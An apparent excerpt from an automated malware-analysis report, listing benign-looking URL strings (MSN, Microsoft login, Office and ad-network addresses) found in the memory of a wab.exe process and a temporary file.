              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFE0J?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=70
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFENj?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFJFJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFLk7?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=43
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFWV8?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFhty?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFsUC?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFu51?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFy7B?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOFyKG?h=75&w=100&m=6&q=60&u=t&o=t&l=f&x=60
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOG3Y7?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOG3Y7?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOG88s?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGPXq?h=194&w=300&m=6&q=60&u=t&o=t&l=f
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGQtJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGV90?h=194&w=300&m=6&q=60&u=t&o=t&l=f&x=5
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGapF?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGlbE?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGmTG?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOGyYN?h=194&w=300&m=6&q=60&u=t&o=t&l=f
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOH2Ml?h=194&w=300&m=6&q=60&u=t&o=t&l=f
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAOH6xB?h=75&w=100&m=6&q=60&u=t&o=t&l=f
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB10MkbM.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB10MkbM?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB14hq0P?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aXBV1?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1cEP3G?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1cG73h?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1ftEY0?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1gEFcn?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=pn
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1kc8s?m=6&o=true&u=true&n=true&w=30&h=30
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7gRE?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hg4?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
              Source: bhv7197.tmp.9.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_368%2Cw_622%2Cc_fill%2Cg_faces:au
              Source: bhv7197.tmp.9.drString found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
              Source: wab.exe, 00000009.00000003.49635589491.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.49637274715.00000000030E3000.00000004.00000010.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://login.live.com/
              Source: wab.exe, 00000009.00000003.49635589491.00000000051C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
              Source: wab.exe, 00000009.00000002.49637274715.00000000030E3000.00000004.00000010.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49635462919.00000000059D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/LH
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsign
              Source: wab.exe, 00000009.00000003.49626062080.00000000051BD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627438697.00000000051BD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626658498.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49635958345.00000000051AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627734054.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626188632.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626603872.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49636032003.00000000051AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626004117.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627476918.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49636137448.00000000051AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49636209374.00000000051AE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627667653.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626819102.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626431685.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626488283.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49635993744.00000000051AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626876567.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627542397.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306842&rver=7.0.6730.0&wp=l
              Source: wab.exe, 00000009.00000003.49625019878.00000000051C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srfwa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306842&rver=7.0.6730.0&wp=lb
              Source: wab.exe, 00000009.00000003.49635589491.00000000051C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
              Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhv7197.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_hj8oSp9QdNfpZ07Gv-Ue0w2.css
              Source: bhv7197.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_qWV3sGhBzcGORhNLatPttg2.css
              Source: bhv7197.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedFinishStrings.en_BYvHTGVEjHmqRinYKC8bUQ2.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_fBfIO6PUjtiIRe-Q1r1v
              Source: bhv7197.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/WinJS_vcvx4TydCFioSeM4NLxTDw2.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.sv
              Source: bhv7197.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d
              Source: bhv7197.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab
              Source: bhv7197.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/marching_ants_white_166de53471265253ab3a456def
              Source: bhv7197.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90b
              Source: bhv7197.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/Win10HostFinish_PCore_3l9yQcHwDX6JY4dnECC1pg2.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/Win10HostLogin_PCore_rfy0-A_Y4TdpeysEFWwI1w2.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/asyncchunk/win10hostlogin_ppassword_545f714b012517
              Source: bhv7197.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_5b54317b5869f142bd86.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
              Source: bhv7197.tmp.9.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
              Source: bhv7197.tmp.9.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.offiH
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeaph
              Source: bhv7197.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/jsonstrings?g=EmailHrdv2&mkt=1033&hm=2
              Source: bhv7197.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/hrd.css?b=14512.30550
              Source: bhv7197.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/hrd.min.js?b=14512.30550
              Source: bhv7197.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/hrd.min.js?b=16521.30551
              Source: bhv7197.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/federationProvider?domain=outlook.com&_=1632306668408
              Source: bhv7197.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/federationProvider?domain=outlook.com&_=1685097289379
              Source: bhv7197.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
              Source: wab.exe, 00000009.00000003.49626249266.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627377448.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626710700.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626310766.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626108182.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626762184.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626930014.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627607503.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49624792000.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626062080.00000000051BD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626658498.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49635958345.00000000051AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627734054.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626188632.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626603872.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49636032003.00000000051AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626004117.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627476918.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49636137448.00000000051AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49636209374.00000000051AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
              Source: bhv7197.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/idp?hm=1&emailAddress=shahak.shapira%40outlook.com&_=168509
              Source: bhv7197.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/idp?hm=2&emailAddress=shahak.shapira%40outlook.com&_=163230
              Source: bhv7197.tmp.9.drString found in binary or memory: https://outlookmobile-office365-tas.msedge.net/ab?clientId=512A4435-60B8-42A2-80D3-582B6B7FB6C0&ig=1
              Source: bhv7197.tmp.9.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2787436b358dbd81d7fd0a0cccb05788
              Source: bhv7197.tmp.9.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f068a709ecd1f0c000b440d901cea9b
              Source: bhv7197.tmp.9.drString found in binary or memory: https://pagead2.googlesyndication.com/bg/4j6j1KaqOj9dOTqNDUFIq-pj8a-_5PTo96X1Pctm55w.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://pagead2.googlesyndication.com/getconfig/sodar?sv=200&tid=gda&tv=r20210916&st=env
              Source: bhv7197.tmp.9.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_csp?id=adbundle&qqi=CPuOuO2wkvMCFQDJuwgdDw4EyQ&gqi=
              Source: bhv7197.tmp.9.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/managed/js/adsense/m202109200101/show_ads_impl_with_ama
              Source: bhv7197.tmp.9.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/show_ads.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://partner.googleadservices.com/gampad/cookie.js?domain=ib.adnxs.com&callback=_gfp_s_&client=ca
              Source: bhv7197.tmp.9.drString found in binary or memory: https://partner.googleadservices.com/gampad/cookie.js?domain=www.msn.com&callback=_gfp_s_&client=ca-
              Source: bhv7197.tmp.9.drString found in binary or memory: https://pki.goog/repository/0
              Source: bhv7197.tmp.9.drString found in binary or memory: https://polyfill.io/v3/polyfill.min.js?features=2CElement.prototype.matches%2CElement.prototype.clos
              Source: bhv7197.tmp.9.drString found in binary or memory: https://px.ads.linkedin.com/setuid?partner=tripleliftdbredirect&tlUid=13122329571212727769&dbredirec
              Source: bhv7197.tmp.9.drString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
              Source: bhv7197.tmp.9.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/7zPvmktG8JzqA0vnWzpk_g--~A/Zmk9Zml0O3c9NjIyO2g9MzY4O2FwcGlkPWdlbWl
              Source: bhv7197.tmp.9.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/10170131.js?ADFassetID=10170131&bv=258
              Source: bhv7197.tmp.9.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/footer.png
              Source: bhv7197.tmp.9.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k2.jpg
              Source: bhv7197.tmp.9.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k3.jpg
              Source: bhv7197.tmp.9.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k4.jpg
              Source: bhv7197.tmp.9.drString found in binary or memory: https://s1.adform.net/banners/scripts/rmb/Adform.DHTML.js?bv=0.5146119884770144
              Source: bhv7197.tmp.9.drString found in binary or memory: https://s1.adform.net/banners/scripts/rmb/Adform.DHTML.js?bv=626
              Source: bhv7197.tmp.9.drString found in binary or memory: https://s1.adform.net/stoat/626/s1.adform.net/bootstrap.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://s1.adform.net/stoat/626/s1.adform.net/load/v/0.0.209/e/-gABoCBA/i/vCAv.IAAAAAoAA/r:AdConstru
              Source: bhv7197.tmp.9.drString found in binary or memory: https://sb.scorecardresearch.com/b2?c1=2&c2=3000001&cs_ucfr=1&rn=1632306836522&c7=https%3A%2F%2Fwww.
              Source: bhv7197.tmp.9.drString found in binary or memory: https://sb.scorecardresearch.com/beacon.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://sectigo.com/CPS0
              Source: wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626108182.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626762184.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626930014.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627607503.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626062080.00000000051BD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627438697.00000000051BD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626658498.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627734054.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626188632.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626603872.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626004117.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627476918.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627667653.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626819102.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626431685.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626488283.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49626876567.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49627542397.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://servedby.flashtalking.com/imp/8/106228;3700839;201;jsiframe;Adobe;1000x463DESKTOPACROBATREAD
              Source: bhv7197.tmp.9.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=4aeddfea844042999a22bdcca1fba378&c=MSN&d=https%3A%2F%2Fwww.ms
              Source: bhv7197.tmp.9.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=838b780a64e64b0d92d628632c1c377c&c=MSN&d=https%3A%2F%2Fwww.ms
              Source: bhv7197.tmp.9.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=bba24733ba4a487f8f8706bf3811269e&c=MSN&d=https%3A%2F%2Fwww.ms
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jque
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-d68e7b58/direct
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directi
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-d017f019/directi
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAKp8YX.img?h=16&w=16&
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAMqFmF.img?h=16&w=16&
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODMk8.img?h=75&w=100
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODQmd.img?h=75&w=100
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODept.img?h=75&w=100
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOEFck.img?h=75&w=100
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOEQ0I.img?h=368&w=62
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOF4WR.img?h=75&w=100
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOF4Xx.img?h=368&w=62
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFBrV.img?h=75&w=100
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFC5q.img?h=75&w=100
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFCgW.img?h=250&w=30
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFCgW.img?h=75&w=100
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFE0J.img?h=75&w=100
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFENj.img?h=75&w=100
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFJFJ.img?h=75&w=100
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFLk7.img?h=75&w=100
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFWV8.img?h=75&w=100
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFhty.img?h=368&w=62
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFsUC.img?h=250&w=30
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFu51.img?h=75&w=100
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFy7B.img?h=75&w=100
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFyKG.img?h=75&w=100
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOG3Y7.img?h=250&w=30
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOG3Y7.img?h=75&w=100
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOG88s.img?h=75&w=100
